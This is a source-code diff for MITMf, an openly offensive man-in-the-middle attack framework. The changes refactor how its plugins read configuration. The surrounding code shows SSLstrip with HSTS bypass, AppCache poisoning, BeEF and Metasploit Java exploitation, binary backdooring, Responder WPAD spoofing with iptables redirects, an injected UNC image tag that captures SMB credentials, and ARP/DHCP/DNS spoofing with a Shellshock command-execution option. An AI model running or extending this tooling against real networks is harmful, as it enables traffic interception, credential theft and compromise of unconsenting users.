mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
mgroup.add_argument("-i", "--interface", type=str, metavar="interface" ,help="Interface to listen on")
mgroup.add_argument("-c", "--config-file", dest='configfile', type=str, default="./config/mitmf.cfg", metavar='configfile', help="Specify config file to use")
mgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Only run plugins, disable all proxies')
#add sslstrip options
sgroup = parser.add_argument_group("sslstrip", "Options for sslstrip library")
sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library")
#sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).")
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
slogopts = sgroup.add_mutually_exclusive_group()
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
#slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet
sgroup.add_argument("-i", "--interface", type=str, required=True, metavar="interface" ,help="Interface to listen on")
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy')
sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", default=False, help="Enable HSTS bypass")
#Initialize plugins
plugins = []
@ -69,6 +71,23 @@ if __name__ == "__main__":
args = parser.parse_args()
try:
configfile = ConfigObj(args.configfile)
except Exception, e:
sys.exit("[-] Error parsing config file: " + str(e))
config_args = configfile['MITMf']['args']
if config_args:
print "[*] Loading arguments from config file"
for arg in config_args.split(' '):
sys.argv.append(arg)
args = parser.parse_args()
if not args.interface:
sys.exit("[-] -i , --interface argument is required")
args.configfile = configfile #so we can pass the configobj down to all the plugins
log_level = logging.__dict__[args.log_level.upper()]
#Start logging
@ -84,7 +103,7 @@ if __name__ == "__main__":
print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version
if ('--responder' and '--wpad') in sys.argv:
args.listen = 3141
print "[*] Listening on port 3141 since --wpad was passed"
print "[*] SSLstrip is now listening on port 3141 since --wpad was passed"
load = []
try:
@ -103,7 +122,7 @@ if __name__ == "__main__":
from libs.sslstrip.StrippingProxy import StrippingProxy
from libs.sslstrip.URLMonitor import URLMonitor
URLMonitor.getInstance().setValues(args.favicon, args.hsts)
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)

41
plugins/AppCachePoison.py
View file

@ -1,15 +1,14 @@
#
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
#######################################################################################################
from plugins.plugin import Plugin
from datetime import date
from libs.sslstrip.URLMonitor import URLMonitor
import logging
import ConfigParser
import re
import os.path
import time
import sys
class AppCachePlugin(Plugin):
name = "App Cache Poison"
@ -21,24 +20,15 @@ class AppCachePlugin(Plugin):
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.config_file = "./config/app_cache_poison.cfg"
self.config = None
self.mass_poisoned_browsers = []
self.urlMonitor = URLMonitor.getInstance()
try:
self.config = options.configfile['AppCachePoison']
except Exception, e:
sys.exit("[-] Error parsing config file for AppCachePoison: " + str(e))
print "[*] App Cache Poison plugin online"
self.createTamperer(self.config_file)
def parseConfig(self, configFile):
config = ConfigParser.ConfigParser()
config.read(configFile)
readConfig = config._sections
readConfig.update(config.defaults())
return readConfig
def createTamperer(self, configFile):
logging.debug("Reading tamper config file: %s" % (configFile))
self.config = self.parseConfig(configFile)
def handleResponse(self, request, data):
@ -55,12 +45,12 @@ class AppCachePlugin(Plugin):
urls = self.urlMonitor.getRedirectionSet(url)
(s,element,url) = self.getSectionForUrls(urls)
if not s:
(name,s,element,url) = self.getSectionForUrls(urls)
if s is False:
data = self.tryMassPoison(url, data, headers, req_headers, ip)
return {'request': request, 'data': data}
logging.debug("Found URL %s in section %s" % (url, s['__name__']))
logging.debug("Found URL %s in section %s" % (url, name))
p = self.getTemplatePrefix(s)
if element == 'tamper':
logging.debug("Poisoning tamper URL with template %s" % (p))
@ -175,15 +165,16 @@ class AppCachePlugin(Plugin):
for i in self.config:
if isinstance(self.config[i], dict): #section
section = self.config[i]
name = i
if section.get('tamper_url',False) == url:
return (section, 'tamper',url)
return (name, section, 'tamper',url)
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
return (section, 'tamper',url)
return (name, section, 'tamper',url)
if section.get('manifest_url',False) == url:
return (section, 'manifest',url)
return (name, section, 'manifest',url)
if section.get('raw_url',False) == url:
return (section, 'raw',url)
return (name, section, 'raw',url)
return (False,'',urls.copy().pop())
return (None, False,'',urls.copy().pop())

16
plugins/BeefAutorun.py
View file

@ -9,11 +9,6 @@ import json
import threading
import libs.beefapi as beefapi
try:
from configobj import ConfigObj
except:
sys.exit('[-] configobj library not installed!')
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
requests_log.setLevel(logging.WARNING)
@ -27,8 +22,15 @@ class BeefAutorun(Inject, Plugin):
def initialize(self, options):
self.options = options
beefconfig = ConfigObj("./config/mitmf.cfg")['BeEF']
userconfig = ConfigObj("./config/beefautorun.cfg")
try:
beefconfig = options.configfile['MITMf']['BeEF']
except Exception, e:
sys.exit("[-] Error parsing BeEF options in config file: " + str(e))
try:
userconfig = options.configfile['BeEFAutorun']
except Exception, e:
sys.exit("[-] Error parsing config for BeEFAutorun: " + str(e))
self.Mode = userconfig['mode']
self.All_modules = userconfig["ALL"]

2
plugins/CacheKill.py
View file

@ -2,7 +2,7 @@ from plugins.plugin import Plugin
class CacheKill(Plugin):
name = "CacheKill Plugin"
name = "CacheKill"
optname = "cachekill"
desc = "Kills page caching by modifying headers"
implements = ["handleHeader", "connectionMade"]

2
plugins/FilePwn.py
View file

@ -88,7 +88,7 @@ class FilePwn(Plugin):
#NOT USED NOW
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
self.userConfig = ConfigObj("./config/filepwn.cfg")
self.userConfig = options.configfile['FilePwn']
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']

1
plugins/Inject.py
View file

@ -3,6 +3,7 @@ logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Er
from scapy.all import get_if_addr
import time
import re
import sys
import argparse
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill

12
plugins/JavaPwn.py
View file

@ -9,7 +9,6 @@ import sys
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import get_if_addr
from configobj import ConfigObj
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
requests_log.setLevel(logging.WARNING)
@ -26,8 +25,15 @@ class JavaPwn(BrowserProfiler, Plugin):
self.options = options
self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit
msfcfg = ConfigObj('./config/mitmf.cfg')['Metasploit']
self.javacfg = ConfigObj('./config/javapwn.cfg')
try:
msfcfg = options.configfile['MITMf']['Metasploit']
except Exception, e:
sys.exit("[-] Error parsing Metasploit options in config file : " + str(e))
try:
self.javacfg = options.configfile['JavaPwn']
except Exception, e:
sys.exit("[-] Error parsing config for JavaPwn: " + str(e))
self.msfport = msfcfg['msfport']
self.rpcip = msfcfg['rpcip']

13
plugins/Responder.py
View file

@ -23,6 +23,11 @@ class Responder(Plugin):
if os.geteuid() != 0:
sys.exit("[-] Responder plugin requires root privileges")
try:
config = options.configfile['Responder']
except Exception, e:
sys.exit('[-] Error parsing config for Responder: ' + str(e))
try:
self.ip_address = get_if_addr(options.interface)
if self.ip_address == "0.0.0.0":
@ -32,16 +37,16 @@ class Responder(Plugin):
print "[*] Responder plugin online"
DnsCache.getInstance().setCustomAddress(self.ip_address)
DnsCache.getInstance().setCustomRes('wpad', self.ip_address)
DnsCache.getInstance().setCustomRes('ISAProxySrv', self.ip_address)
DnsCache.getInstance().setCustomRes('RespProxySrv', self.ip_address)
for name in ['wpad', 'ISAProxySrv', 'RespProxySrv']:
DnsCache.getInstance().setCustomRes(name, self.ip_address)
if '--spoof' not in sys.argv:
print '[*] Setting up iptables'
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % options.listen)
t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address))
t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address, config))
t.setDaemon(True)
t.start()

15
plugins/SMBAuth.py
View file

@ -1,5 +1,9 @@
from plugins.plugin import Plugin
from plugins.Inject import Inject
import sys
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import get_if_addr
class SMBAuth(Inject, Plugin):
@ -11,10 +15,19 @@ class SMBAuth(Inject, Plugin):
Inject.initialize(self, options)
self.target_ip = options.host
self.html_payload = self._get_data()
if self.target_ip is None:
try:
self.target_ip = get_if_addr(options.interface)
if self.target_ip == "0.0.0.0":
sys.exit("[-] Interface %s does not have an IP address" % options.interface)
except Exception, e:
sys.exit("[-] Error retrieving interface IP address: %s" % e)
print "[*] SMBAuth plugin online"
def add_options(self, options):
options.add_argument("--host", type=str, help="The ip address of your capture server")
options.add_argument("--host", type=str, default=None, help="The ip address of your capture server [default: interface IP]")
def _get_data(self):
return '<img src=\"\\\\%s\\image.jpg\">'\

20
plugins/SSLstrip+.py Normal file
View file

@ -0,0 +1,20 @@
from plugins.plugin import Plugin
from libs.sslstrip.URLMonitor import URLMonitor
import sys
class HSTSbypass(Plugin):
name = 'SSLstrip+'
optname = 'hsts'
desc = 'Enables SSLstrip+ for partial HSTS bypass'
has_opts = False
def initialize(self, options):
self.options = options
try:
config = options.configfile['SSLstrip+']
except Exception, e:
sys.exit("[-] Error parsing config for SSLstrip+: " + str(e))
print "[*] SSLstrip+ plugin online"
URLMonitor.getInstance().setHstsBypass(config)

9
plugins/Spoof.py
View file

@ -20,7 +20,6 @@ from base64 import b64decode
from urllib import unquote
import binascii
import random
from configobj import ConfigObj
class Spoof(Plugin):
@ -93,7 +92,7 @@ class Spoof(Plugin):
self.rand_number = []
self.dhcp_dic = {}
self.dhcpcfg = ConfigObj("./config/dhcp.cfg")
self.dhcpcfg = options.configfile['Spoof']['DHCP']
thread_target = self.dhcp_sniff
thread_args = ()
@ -109,9 +108,9 @@ class Spoof(Plugin):
print "[*] DNS Tampering enabled"
if self.dns:
self.dnscfg = ConfigObj("./config/dns.cfg")
self.dnscfg = options.configfile['Spoof']['DNS']
self.hstscfg = ConfigObj("./config/hsts_bypass.cfg")
self.hstscfg = options.configfile['SSLstrip+']
if not self.manualiptables:
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
@ -334,7 +333,7 @@ class Spoof(Plugin):
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
options.add_argument('--shellshock', type=str, dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')